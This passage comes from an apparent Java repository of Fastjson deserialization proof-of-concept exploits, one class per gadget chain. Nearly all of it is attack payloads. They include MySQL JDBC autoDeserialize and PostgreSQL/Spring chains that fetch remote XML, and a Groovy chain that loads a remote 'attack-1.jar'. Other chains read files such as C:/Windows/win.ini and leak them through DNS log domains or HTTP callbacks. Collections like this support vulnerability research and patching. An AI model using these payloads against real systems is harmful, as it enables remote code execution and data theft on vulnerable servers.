 7 |     public static void main(String[] args) throws Exception{
 8 |         String payload = "{\r\n"
 9 |         		+ "	\"@type\": \"java.lang.AutoCloseable\",\r\n"
10 |         		+ "	\"@type\": \"com.mysql.cj.jdbc.ha.ReplicationMySQLConnection\",\r\n"
11 |         		+ "	\"proxy\": {\r\n"
12 |         		+ "		\"@type\": \"com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy\",\r\n"
13 |         		+ "		\"connectionUrl\": {\r\n"
14 |         		+ "			\"@type\": \"com.mysql.cj.conf.url.ReplicationConnectionUrl\",\r\n"
15 |         		+ "			\"masters\": [{\r\n"
16 |         		+ "				\"host\": \"\"\r\n"
17 |         		+ "			}],\r\n"
18 |         		+ "			\"slaves\": [],\r\n"
19 |         		+ "			\"properties\": {\r\n"
20 |         		+ "				\"host\": \"127.0.0.1\",\r\n"
21 |         		+ "				\"user\": \"yso_CommonsCollections4_calc\",\r\n"
22 |         		+ "				\"dbname\": \"dbname\",\r\n"
23 |         		+ "				\"password\": \"pass\",\r\n"
24 |         		+ "				\"queryInterceptors\": \"com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor\",\r\n"
25 |         		+ "				\"autoDeserialize\": \"true\"\r\n"
26 |         		+ "			}\r\n"
27 |         		+ "		}\r\n"
28 |         		+ "	}\r\n"
29 |         		+ "}\r\n"
30 |         		+ "";
31 |         System.out.println(payload);
32 |     	JSON.parseObject(payload);
33 |     }
34 | }
35 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson16_pgsql.java:
--------------------------------------------------------------------------------
 1 | package com.shiro.vuln.fastjson;
 2 | import com.alibaba.fastjson.JSON;
 3 | 
 4 | public class Fastjson16_pgsql {
 5 |     public static void main(String[] args) throws Exception {
 6 |     	
 7 |         //<=1.2.68,依赖postgresql-42.3.1和spring环境,参考Pgsql的jdbc危害。
 8 |     	//h2 jar包居然没用-g编译，因此不用考虑h2的jdbc了
 9 |         String payload = "{\r\n"
10 |         		+ "	\"@type\": \"java.lang.AutoCloseable\",\r\n"
11 |         		+ "	\"@type\": \"org.postgresql.jdbc.PgConnection\",\r\n"
12 |         		+ "	\"hostSpecs\": [{\r\n"
13 |         		+ "		\"host\": \"127.0.0.1\",\r\n"
14 |         		+ "		\"port\": 2333\r\n"
15 |         		+ "	}],\r\n"
16 |         		+ "	\"user\": \"test\",\r\n"
17 |         		+ "	\"database\": \"test\",\r\n"
18 |         		+ "	\"info\": {\r\n"
19 |         		+ "		\"socketFactory\": \"org.springframework.context.support.ClassPathXmlApplicationContext\",\r\n"
20 |         		+ "		\"socketFactoryArg\": \"http://127.0.0.1:81/test.xml\"\r\n"
21 |         		+ "	},\r\n"
22 |         		+ "	\"url\": \"\"\r\n"
23 |         		+ "}";
24 | //        payload = "{\r\n"
25 | //        		+ "	\"@type\": \"java.lang.AutoCloseable\",\r\n"
26 | //        		+ "	\"@type\": \"org.postgresql.jdbc.PgConnection\",\r\n"
27 | //        		+ "	\"hostSpecs\": [{\r\n"
28 | //        		+ "		\"host\": \"127.0.0.1\",\r\n"
29 | //        		+ "		\"port\": 2333\r\n"
30 | //        		+ "	}],\r\n"
31 | //        		+ "	\"user\": \"test\",\r\n"
32 | //        		+ "	\"database\": \"test\",\r\n"
33 | //        		+ "	\"info\": {\r\n"
34 | //        		+ "		\"socketFactory\": \"java.io.FileOutputStream\",\r\n"
35 | //        		+ "		\"socketFactoryArg\": \"1.txt\"\r\n"
36 | //        		+ "	},\r\n"
37 | //        		+ "	\"url\": \"\"\r\n"
38 | //        		+ "}";
39 |         
40 |         
41 |         System.out.println(payload);
42 |         JSON.parseObject(payload);	
43 |     }
44 | }
45 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson17_groovy.java:
--------------------------------------------------------------------------------
 1 | package com.shiro.vuln.fastjson;
 2 | import com.alibaba.fastjson.JSON;
 3 | 
 4 | public class Fastjson17_groovy {
 5 |     public static void main(String[] args){
 6 | 
 7 |         //依赖1.2.76-1.2.80，依赖groovy
 8 |     	//jar包写法见https://github.com/Lonely-night/fastjsonVul/tree/7f9d2d8ea1c27ae1f9c06076849ae76c25b6aff7
 9 |     	String poc1 = "{\n" +
10 |                 "    \"@type\":\"java.lang.Exception\",\n" +
11 |                 "    \"@type\":\"org.codehaus.groovy.control.CompilationFailedException\",\n" +
12 |                 "    \"unit\":{}\n" +
13 |                 "}";
14 |         String poc2 = "{\n" +
15 |                 "    \"@type\":\"org.codehaus.groovy.control.ProcessingUnit\",\n" +
16 |                 "    \"@type\":\"org.codehaus.groovy.tools.javac.JavaStubCompilationUnit\",\n" +
17 |                 "    \"config\":{\n" +
18 |                 "        \"@type\":\"org.codehaus.groovy.control.CompilerConfiguration\",\n" +
19 |                 "        \"classpathList\":\"http://127.0.0.1:81/attack-1.jar\"\n" +
20 |                 "    }\n" +
21 |                 "}";
22 |         System.out.println(poc1);
23 |         System.out.println(poc2);
24 |         try {
25 |         	JSON.parseObject(poc1);
26 | 		} catch (Exception e) {}
27 |         JSON.parseObject(poc2);
28 |     }
29 | }
30 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson18_ajt_read_error_dnslog.java:
--------------------------------------------------------------------------------
 1 | package com.shiro.vuln.fastjson;
 2 | import com.alibaba.fastjson.JSON;
 3 | 
 4 | public class Fastjson18_ajt_read_error_dnslog {
 5 |     public static void main(String[] args){
 6 |     	
 7 |         //依赖1.2.73-1.2.80，依赖aspectjtools
 8 |     	String poc1 = "{\n" +
 9 |             "    \"@type\":\"java.lang.Exception\",\n" +
10 |             "    \"@type\":\"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException\"\n" +
11 |             "}";
12 |     	String poc2 = "{\r\n"
13 |     			+ "	\"@type\": \"java.lang.Class\",\r\n"
14 |     			+ "	\"val\": {\r\n"
15 |     			+ "		\"@type\": \"java.lang.String\" {\r\n"
16 |     			+ "			\"@type\": \"java.util.Locale\",\r\n"
17 |     			+ "			\"val\": {\r\n"
18 |     			+ "				\"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
19 |     			+ "				{\r\n"
20 |     			+ "					\"@type\": \"java.lang.String\"\r\n"
21 |     			+ "					\"@type\": \"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException\",\r\n"
22 |     			+ "					\"newAnnotationProcessorUnits\": [{}]\r\n"
23 |     			+ "				}\r\n"
24 |     			+ "			}\r\n"
25 |     			+ "";
26 |     	
27 |     	
28 |     	
29 |     	
30 |     	
31 |     	String poc3 = "{\n" +
32 |             "    \"x\":{\n" +
33 |             "        \"@type\":\"org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit\",\n" +
34 |             "        \"@type\":\"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit\",\n" +
35 |             "        \"fileName\":\"C:/windows/win.ini\"\n" +
36 |             "    }\n" +
37 |             "}";
38 |     	System.out.println(poc1);
39 |     	System.out.println(poc2);
40 |         JSON.parseObject(poc1);
41 |         try {
42 |             JSON.parseObject(poc2);
43 |         } catch (Exception e){}
44 |         System.out.println(poc3);
45 |         System.out.println(JSON.parseObject(poc3));
46 |         
47 |         //报错回显
48 |         poc3 = "{\r\n"
49 |         		+ "	\"@type\": \"java.lang.Character\" {\r\n"
50 |         		+ "		\"C\": {\r\n"
51 |         		+ "			\"x\": {\r\n"
52 |         		+ "				\"@type\": \"org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit\",\r\n"
53 |         		+ "				\"@type\": \"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit\",\r\n"
54 |         		+ "				\"fileName\": \"C:/windows/win.ini\"\r\n"
55 |         		+ "			}\r\n"
56 |         		+ "		}\r\n"
57 |         		+ "	}\r\n"
58 |         		+ "}";
59 |         
60 |         //dnslog回显(由于存在特殊字符，似乎只有mac且特定dnslog平台可以接收)
61 |         poc3 = "{\r\n"
62 |         		+ "    \"@type\":\"java.net.Inet4Address\",\r\n"
63 |         		+ "    \"val\":{\r\n"
64 |         		+ "        \"@type\":\"java.lang.String\"{\r\n"
65 |         		+ "        \"@type\":\"java.util.Locale\",\r\n"
66 |         		+ "        \"val\":{\r\n"
67 |         		+ "            \"@type\":\"com.alibaba.fastjson.JSONObject\",{\r\n"
68 |         		+ "                \"@type\":\"java.lang.String\"\r\n"
69 |         		+ "                \"@type\":\"java.util.Locale\",\r\n"
70 |         		+ "                \"country\":\"97477dfe.logplog.eu.org\",\r\n"
71 |         		+ "                \"language\":{\r\n"
72 |         		+ "                    \"@type\":\"java.lang.String\"{\r\n"
73 |         		+ "                    \"x\":{\r\n"
74 |         		+ "				\"@type\": \"org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit\",\r\n"
75 |         		+ "				\"@type\": \"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit\",\r\n"
76 |         		+ "				\"fileName\": \"C:/windows/win.ini\"\r\n"
77 |         		+ "			}\r\n"
78 |         		+ "                }\r\n"
79 |         		+ "            }\r\n"
80 |         		+ "        }\r\n"
81 |         		+ "    }\r\n"
82 |         		+ "  }\r\n"
83 |         		+ "}\r\n"
84 |         		+ "}\r\n"
85 |         		+ "\r\n"
86 |         		+ "\r\n"
87 |         		+ "\r\n"
88 |         		+ "";
89 | 
90 |         
91 |         
92 |     	//System.out.println(poc3);
93 |         //JSON.parseObject(poc3);
94 | 
95 |     }
96 | }
97 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson19_ajt_read_error_dnslog_2.java:
--------------------------------------------------------------------------------
 1 | package com.shiro.vuln.fastjson;
 2 | 
 3 | import com.alibaba.fastjson.JSON;
 4 | 
 5 | public class Fastjson19_ajt_read_error_dnslog_2 {
 6 |     public static void main(String[] args){
 7 |     	
 8 |         //依赖1.2.73-1.2.80，依赖aspectjtools 仅仅是将poc简化成发两个包
 9 |     	String poc1 = "[{\r\n"
10 |     			+ "		\"@type\": \"java.lang.Exception\",\r\n"
11 |     			+ "		\"@type\": \"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException\"\r\n"
12 |     			+ "	},\r\n"
13 |     			+ "	{\r\n"
14 |     			+ "		\"@type\": \"java.lang.Class\",\r\n"
15 |     			+ "		\"val\": {\r\n"
16 |     			+ "			\"@type\": \"java.lang.String\" {\r\n"
17 |     			+ "				\"@type\": \"java.util.Locale\",\r\n"
18 |     			+ "				\"val\": {\r\n"
19 |     			+ "					\"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
20 |     			+ "					{\r\n"
21 |     			+ "						\"@type\": \"java.lang.String\"\r\n"
22 |     			+ "						\"@type\": \"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException\",\r\n"
23 |     			+ "						\"newAnnotationProcessorUnits\": [{}]\r\n"
24 |     			+ "					}\r\n"
25 |     			+ "				}\r\n"
26 |     			+ "			},\r\n"
27 |     			+ "			{\r\n"
28 |     			+ "				\"x\": {\r\n"
29 |     			+ "					\"@type\": \"org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit\",\r\n"
30 |     			+ "					\"@type\": \"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit\",\r\n"
31 |     			+ "					\"fileName\": \"aaa\"\r\n"
32 |     			+ "				}\r\n"
33 |     			+ "			}]";
34 |     	//报错回显
35 |     	String poc2 = "{\r\n"
36 |     			+ "\"@type\":\"java.lang.Character\"{\"c\":{\r\n"
37 |     			+ "\"@type\":\"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit\",\r\n"
38 |     			+ "\"fileName\":\"C:/Windows/win.ini\"}}";
39 |     	
40 |     	
41 |     	//dnslog带出，似乎只有mac环境才行
42 |     	poc2 = "{\r\n"
43 |     			+ "	\"a\": {\r\n"
44 |     			+ "		\"@type\": \"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit\",\r\n"
45 |     			+ "		\"fileName\": \"C:/Windows/win.ini\"\r\n"
46 |     			+ "	},\r\n"
47 |     			+ "	\"b\": {\r\n"
48 |     			+ "		\"@type\": \"java.net.Inet4Address\",\r\n"
49 |     			+ "		\"val\": {\r\n"
50 |     			+ "			\"@type\": \"java.lang.String\" {\r\n"
51 |     			+ "				\"@type\": \"java.util.Locale\",\r\n"
52 |     			+ "				\"val\": {\r\n"
53 |     			+ "					\"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
54 |     			+ "					{\r\n"
55 |     			+ "						\"@type\": \"java.lang.String\"\r\n"
56 |     			+ "						\"@type\": \"java.util.Locale\",\r\n"
57 |     			+ "						\"language\": {\r\n"
58 |     			+ "							\"@type\": \"java.lang.String\" {\r\n"
59 |     			+ "								\"$ref\": \"$\"\r\n"
60 |     			+ "							},\r\n"
61 |     			+ "							\"country\": \"17e92b3b.dns.1433.eu.org\"\r\n"
62 |     			+ "						}\r\n"
63 |     			+ "					}\r\n"
64 |     			+ "				}\r\n"
65 |     			+ "		";
66 |     	
67 | 
68 |     	
69 |     	System.out.println(poc1);
70 |     	System.out.println(poc2);
71 |         try {
72 |             JSON.parseObject(poc1);
73 |         } catch (Exception e){}
74 |         JSON.parseObject(poc2);
75 | 
76 |         
77 | 
78 |     }
79 | }
80 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson20_ajt_ognl_io_read_httplog.java:
--------------------------------------------------------------------------------
  1 | package com.shiro.vuln.fastjson;
  2 | 
  3 | import com.alibaba.fastjson.JSON;
  4 | 
  5 | public class Fastjson20_ajt_ognl_io_read_httplog {
  6 |     public static void main(String[] args){
  7 |     	
  8 |         //依赖1.2.73-1.2.80，依赖aspectjtools  ognl-3.2.21  commons-io-2.2
  9 |     	String poc1 = "[{\r\n"
 10 |     			+ "		\"@type\": \"java.lang.Exception\",\r\n"
 11 |     			+ "		\"@type\": \"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException\"\r\n"
 12 |     			+ "	},\r\n"
 13 |     			+ "	{\r\n"
 14 |     			+ "		\"@type\": \"java.lang.Class\",\r\n"
 15 |     			+ "		\"val\": {\r\n"
 16 |     			+ "			\"@type\": \"java.lang.String\" {\r\n"
 17 |     			+ "				\"@type\": \"java.util.Locale\",\r\n"
 18 |     			+ "				\"val\": {\r\n"
 19 |     			+ "					\"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
 20 |     			+ "					{\r\n"
 21 |     			+ "						\"@type\": \"java.lang.String\"\r\n"
 22 |     			+ "						\"@type\": \"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException\",\r\n"
 23 |     			+ "						\"newAnnotationProcessorUnits\": [{}]\r\n"
 24 |     			+ "					}\r\n"
 25 |     			+ "				}\r\n"
 26 |     			+ "			},\r\n"
 27 |     			+ "			{\r\n"
 28 |     			+ "				\"x\": {\r\n"
 29 |     			+ "					\"@type\": \"org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit\",\r\n"
 30 |     			+ "					\"@type\": \"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit\",\r\n"
 31 |     			+ "					\"fileName\": \"aaa\"\r\n"
 32 |     			+ "				}\r\n"
 33 |     			+ "			}]";
 34 | 
 35 |     	//http带出
 36 |     	String poc2 = "{\r\n"
 37 |     			+ "	\"su14\": {\r\n"
 38 |     			+ "		\"@type\": \"java.lang.Exception\",\r\n"
 39 |     			+ "		\"@type\": \"ognl.OgnlException\"\r\n"
 40 |     			+ "	},\r\n"
 41 |     			+ "	\"su15\": {\r\n"
 42 |     			+ "		\"@type\": \"java.lang.Class\",\r\n"
 43 |     			+ "		\"val\": {\r\n"
 44 |     			+ "			\"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
 45 |     			+ "			{\r\n"
 46 |     			+ "				\"@type\": \"java.lang.String\"\r\n"
 47 |     			+ "				\"@type\": \"ognl.OgnlException\",\r\n"
 48 |     			+ "				\"_evaluation\": \"\"\r\n"
 49 |     			+ "			}\r\n"
 50 |     			+ "		},\r\n"
 51 |     			+ "		\"su16\": {\r\n"
 52 |     			+ "			\"@type\": \"ognl.Evaluation\",\r\n"
 53 |     			+ "			\"node\": {\r\n"
 54 |     			+ "				\"@type\": \"ognl.ASTMethod\",\r\n"
 55 |     			+ "				\"p\": {\r\n"
 56 |     			+ "					\"@type\": \"ognl.OgnlParser\",\r\n"
 57 |     			+ "					\"stream\": {\r\n"
 58 |     			+ "						\"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
 59 |     			+ "						\"delegate\": {\r\n"
 60 |     			+ "							\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
 61 |     			+ "							\"reader\": {\r\n"
 62 |     			+ "								\"@type\": \"jdk.nashorn.api.scripting.URLReader\",\r\n"
 63 |     			+ "								\"url\": {\r\n"
 64 |     			+ "									\"@type\": \"java.lang.String\" {\r\n"
 65 |     			+ "										\"@type\": \"java.util.Locale\",\r\n"
 66 |     			+ "										\"val\": {\r\n"
 67 |     			+ "											\"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
 68 |     			+ "											{\r\n"
 69 |     			+ "												\"@type\": \"java.lang.String\"\r\n"
 70 |     			+ "												\"@type\": \"java.util.Locale\",\r\n"
 71 |     /*http*/	+ "												\"language\": \"http://127.0.0.1:5667/?test\",\r\n"
 72 |     			+ "												\"country\": {\r\n"
 73 |     			+ "													\"@type\": \"java.lang.String\" [{\r\n"
 74 |     			+ "														\"@type\": \"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit\",\r\n"
 75 |    /*带出文件*/	+ "														\"fileName\": \"C:/Windows/win.ini\"\r\n"
 76 |     			+ "													}]\r\n"
 77 |     			+ "\r\n"
 78 |     			+ "												}\r\n"
 79 |     			+ "											}\r\n"
 80 |     			+ "										},\r\n"
 81 |     			+ "										\"charsetName\": \"UTF-8\",\r\n"
 82 |     			+ "										\"bufferSize\": 1024\r\n"
 83 |     			+ "									},\r\n"
 84 |     			+ "									\"boms\": [{\r\n"
 85 |     			+ "										\"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
 86 |     			+ "										\"charsetName\": \"UTF-8\",\r\n"
 87 |     			+ "										\"bytes\": [\r\n"
 88 |     			+ "											36\r\n"
 89 |     			+ "										]\r\n"
 90 |     			+ "									}]\r\n"
 91 |     			+ "								}\r\n"
 92 |     			+ "							}\r\n"
 93 |     			+ "						}\r\n"
 94 |     			+ "					},\r\n"
 95 |     			+ "					\"su17\": {\r\n"
 96 |     			+ "						\"$ref\": \"$.su16.node.p.stream\"\r\n"
 97 |     			+ "					},\r\n"
 98 |     			+ "					\"su18\": {\r\n"
 99 |     			+ "						\"$ref\": \"$.su17.bOM.bytes\"\r\n"
100 |     			+ "					}\r\n"
101 |     			+ "				}";
102 |     	
103 |     	System.out.println(poc1);
104 |     	System.out.println(poc2);
105 |         try {
106 |             JSON.parseObject(poc1);
107 |         } catch (Exception e){}
108 |         JSON.parseObject(poc2);
109 | 
110 |         
111 | 
112 |     }
113 | }
114 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson21_ajt_xalan_dom4j_io_read_httplog.java:
--------------------------------------------------------------------------------
  1 | package com.shiro.vuln.fastjson;
  2 | 
  3 | import com.alibaba.fastjson.JSON;
  4 | 
  5 | public class Fastjson21_ajt_xalan_dom4j_io_read_httplog {
  6 |     public static void main(String[] args){
  7 |     	
  8 |         //依赖1.2.73-1.2.80，依赖aspectjtools  xalan-2.7.2 dom4j-2.1.3  commons-io-2.2
  9 |     	String poc1 = "[{\r\n"
 10 |     			+ "		\"@type\": \"java.lang.Exception\",\r\n"
 11 |     			+ "		\"@type\": \"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException\"\r\n"
 12 |     			+ "	},\r\n"
 13 |     			+ "	{\r\n"
 14 |     			+ "		\"@type\": \"java.lang.Class\",\r\n"
 15 |     			+ "		\"val\": {\r\n"
 16 |     			+ "			\"@type\": \"java.lang.String\" {\r\n"
 17 |     			+ "				\"@type\": \"java.util.Locale\",\r\n"
 18 |     			+ "				\"val\": {\r\n"
 19 |     			+ "					\"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
 20 |     			+ "					{\r\n"
 21 |     			+ "						\"@type\": \"java.lang.String\"\r\n"
 22 |     			+ "						\"@type\": \"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException\",\r\n"
 23 |     			+ "						\"newAnnotationProcessorUnits\": [{}]\r\n"
 24 |     			+ "					}\r\n"
 25 |     			+ "				}\r\n"
 26 |     			+ "			},\r\n"
 27 |     			+ "			{\r\n"
 28 |     			+ "				\"x\": {\r\n"
 29 |     			+ "					\"@type\": \"org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit\",\r\n"
 30 |     			+ "					\"@type\": \"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit\",\r\n"
 31 |     			+ "					\"fileName\": \"aaa\"\r\n"
 32 |     			+ "				}\r\n"
 33 |     			+ "			}]";
 34 |         String poc2 = "{\r\n"
 35 |         		+ "		\"@type\": \"java.lang.Exception\",\r\n"
 36 |         		+ "		\"@type\": \"org.apache.xml.dtm.DTMConfigurationException\",\"locator\":{}\r\n"
 37 |         		+ "}";
 38 |         String poc3 = "{\r\n"
 39 |         		+ "		\"@type\": \"java.lang.Class\",\r\n"
 40 |         		+ "		\"val\": {\r\n"
 41 |         		+ "			\"@type\": \"java.lang.String\" {\r\n"
 42 |         		+ "				\"@type\": \"java.util.Locale\",\r\n"
 43 |         		+ "				\"val\": {\r\n"
 44 |         		+ "					\"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
 45 |         		+ "					{\r\n"
 46 |         		+ "						\"@type\": \"java.lang.String\"\r\n"
 47 |         		+ "						\"@type\": \"org.apache.xml.dtm.DTMConfigurationException\",\r\n"
 48 |         		+ "						\"locator\": {}\r\n"
 49 |         		+ "					}\r\n"
 50 |         		+ "				}\r\n"
 51 |         		+ "			}";
 52 |         String poc4 = "{\r\n"
 53 |         		+ "	\"su14\": {\r\n"
 54 |         		+ "		\"@type\": \"javax.xml.transform.SourceLocator\",\r\n"
 55 |         		+ "		\"@type\": \"org.apache.xpath.objects.XNodeSetForDOM\",\r\n"
 56 |         		+ "		\"nodeIter\": {\r\n"
 57 |         		+ "			\"@type\": \"org.apache.xpath.NodeSet\"\r\n"
 58 |         		+ "		},\r\n"
 59 |         		+ "		\"xctxt\": {\r\n"
 60 |         		+ "			\"@type\": \"org.apache.xpath.XPathContext\",\r\n"
 61 |         		+ "			\"primaryReader\": {\r\n"
 62 |         		+ "				\"@type\": \"org.dom4j.io.XMLWriter\",\r\n"
 63 |         		+ "				\"entityResolver\": {\r\n"
 64 |         		+ "					\"@type\": \"org.dom4j.io.SAXContentHandler\",\r\n"
 65 |         		+ "					\"inputSource\": {\r\n"
 66 |         		+ "						\"byteStream\": {\r\n"
 67 |         		+ "							\"@type\": \"java.io.InputStream\"\r\n"
 68 |         		+ "						}\r\n"
 69 |         		+ "					}\r\n"
 70 |         		+ "				}\r\n"
 71 |         		+ "			}\r\n"
 72 |         		+ "		}\r\n"
 73 |         		+ "	}\r\n"
 74 |         		+ "}";
 75 |     	//http带出
 76 |         String poc5  = "{\r\n"
 77 |     			+ "                        \"@type\": \"java.io.InputStream\",\r\n"
 78 |     			+ "						\"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
 79 |     			+ "						\"delegate\": {\r\n"
 80 |     			+ "							\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
 81 |     			+ "							\"reader\": {\r\n"
 82 |     			+ "								\"@type\": \"jdk.nashorn.api.scripting.URLReader\",\r\n"
 83 |     			+ "								\"url\": {\r\n"
 84 |     			+ "									\"@type\": \"java.lang.String\" {\r\n"
 85 |     			+ "										\"@type\": \"java.util.Locale\",\r\n"
 86 |     			+ "										\"val\": {\r\n"
 87 |     			+ "											\"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
 88 |     			+ "											{\r\n"
 89 |     			+ "												\"@type\": \"java.lang.String\"\r\n"
 90 |     			+ "												\"@type\": \"java.util.Locale\",\r\n"
 91 |     			+ "												\"language\": \"http://127.0.0.1:5667/?test\",\r\n"
 92 |     			+ "												\"country\": {\r\n"
 93 |     			+ "													\"@type\": \"java.lang.String\" [{\r\n"
 94 |     			+ "														\"@type\": \"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit\",\r\n"
 95 |     			+ "														\"fileName\": \"C:/Windows/win.ini\"\r\n"
 96 |     			+ "													}]\r\n"
 97 |     			+ "\r\n"
 98 |     			+ "												}\r\n"
 99 |     			+ "											}\r\n"
100 |     			+ "										},\r\n"
101 |     			+ "										\"charsetName\": \"UTF-8\",\r\n"
102 |     			+ "										\"bufferSize\": 1024\r\n"
103 |     			+ "									},\r\n"
104 |     			+ "									\"boms\": [{\r\n"
105 |     			+ "										\"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
106 |     			+ "										\"charsetName\": \"UTF-8\",\r\n"
107 |     			+ "										\"bytes\": [\r\n"
108 |     			+ "											36\r\n"
109 |     			+ "										]\r\n"
110 |     			+ "									}]\r\n"
111 |     			+ "								}";
112 |     	
113 |     	System.out.println(poc1);
114 |     	System.out.println(poc2);
115 |         try {
116 |             JSON.parseObject(poc1);
117 |         } catch (Exception e){}
118 |         try {
119 |             JSON.parseObject(poc2);
120 |         } catch (Exception e){}
121 |         
122 |         JSON.parseObject(poc3);
123 |         JSON.parseObject(poc4);
124 |         JSON.parseObject(poc5);
125 | 
126 |         
127 | 
128 |     }
129 | }
130 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson22_ognl_io_read_error_dnslog.java:
--------------------------------------------------------------------------------
  1 | package com.shiro.vuln.fastjson;
  2 | import java.io.IOException;
  3 | import java.io.InputStream;
  4 | import java.net.URL;
  5 | import java.util.Arrays;
  6 | 
  7 | import com.alibaba.fastjson.JSON;
  8 | 
  9 | public class Fastjson22_ognl_io_read_error_dnslog {
 10 |     public static void main(String[] args) throws Exception, IOException{
 11 |     	
 12 |     	String url = "file:///D:/";
 13 |     	InputStream input = new URL(url).openStream();
 14 |     	byte[] bs = new byte[input.available()];
 15 |     	input.read(bs);
 16 |         System.out.println(Arrays.toString(bs));
 17 |         System.out.println(new String(bs));
 18 |     	
 19 |         //依赖1.2.73-1.2.80 ognl-3.2.21  commons-io-2.2 根据报错不一样或者是否有dnslog/httplog来布尔读文件
 20 |         String poc1 ="[{\r\n"
 21 |         		+ "		\"su15\": {\r\n"
 22 |         		+ "			\"@type\": \"java.lang.Exception\",\r\n"
 23 |         		+ "			\"@type\": \"ognl.OgnlException\",\r\n"
 24 |         		+ "		}\r\n"
 25 |         		+ "	}, {\r\n"
 26 |         		+ "		\"su16\": {\r\n"
 27 |         		+ "			\"@type\": \"java.lang.Class\",\r\n"
 28 |         		+ "			\"val\": {\r\n"
 29 |         		+ "				\"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
 30 |         		+ "				{\r\n"
 31 |         		+ "					\"@type\": \"java.lang.String\"\r\n"
 32 |         		+ "					\"@type\": \"ognl.OgnlException\",\r\n"
 33 |         		+ "					\"_evaluation\": \"\"\r\n"
 34 |         		+ "				}\r\n"
 35 |         		+ "			}\r\n"
 36 |         		+ "		},\r\n"
 37 |         		+ "		{\r\n"
 38 |         		+ "			\"su17\": {\r\n"
 39 |         		+ "				\"@type\": \"ognl.Evaluation\",\r\n"
 40 |         		+ "				\"node\": {\r\n"
 41 |         		+ "					\"@type\": \"ognl.ASTMethod\",\r\n"
 42 |         		+ "					\"p\": {\r\n"
 43 |         		+ "						\"@type\": \"ognl.OgnlParser\",\r\n"
 44 |         		+ "						\"stream\": {\r\n"
 45 |         		+ "							\"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
 46 |         		+ "							\"delegate\": {\r\n"
 47 |         		+ "								\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
 48 |         		+ "								\"reader\": {\r\n"
 49 |         		+ "									\"@type\": \"jdk.nashorn.api.scripting.URLReader\",\r\n"
 50 |    /*文件路径*/	+ "									\"url\": \"file:///D:/\"\r\n"
 51 |         		+ "								},\r\n"
 52 |         		+ "								\"charsetName\": \"UTF-8\",\r\n"
 53 |         		+ "								\"bufferSize\": 1024\r\n"
 54 |         		+ "							},\r\n"
 55 |         		+ "							\"boms\": [{\r\n"
 56 |         		+ "								\"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
 57 |         		+ "								\"charsetName\": \"UTF-8\",\r\n"
 58 |         		+ "								\"bytes\": [\r\n"
 59 |    /*文件bytes*/	+ "									36, 82\r\n"
 60 |         		+ "								]\r\n"
 61 |         		+ "							}]\r\n"
 62 |         		+ "						}\r\n"
 63 |         		+ "					}\r\n"
 64 |         		+ "				}\r\n"
 65 |         		+ "			}\r\n"
 66 |         		+ "		},\r\n"
 67 |         		+ "		{\r\n"
 68 |         		+ "			\"su18\": {\r\n"
 69 |         		+ "				\"$ref\": \"$[2].su17.node.p.stream\"\r\n"
 70 |         		+ "			}\r\n"
 71 |         		+ "		},\r\n"
 72 |         		+ "		{\r\n"
 73 |         		+ "			\"su19\": {\r\n"
 74 |         		+ "				\"$ref\": \"$[3].su18.bOM.bytes\"\r\n"
 75 |         		+ "			}\r\n"
 76 |         		+ "		},{\r\n"
 77 |         		+ "			\"su20\": {\r\n"
 78 |         		+ "				\"@type\": \"ognl.Evaluation\",\r\n"
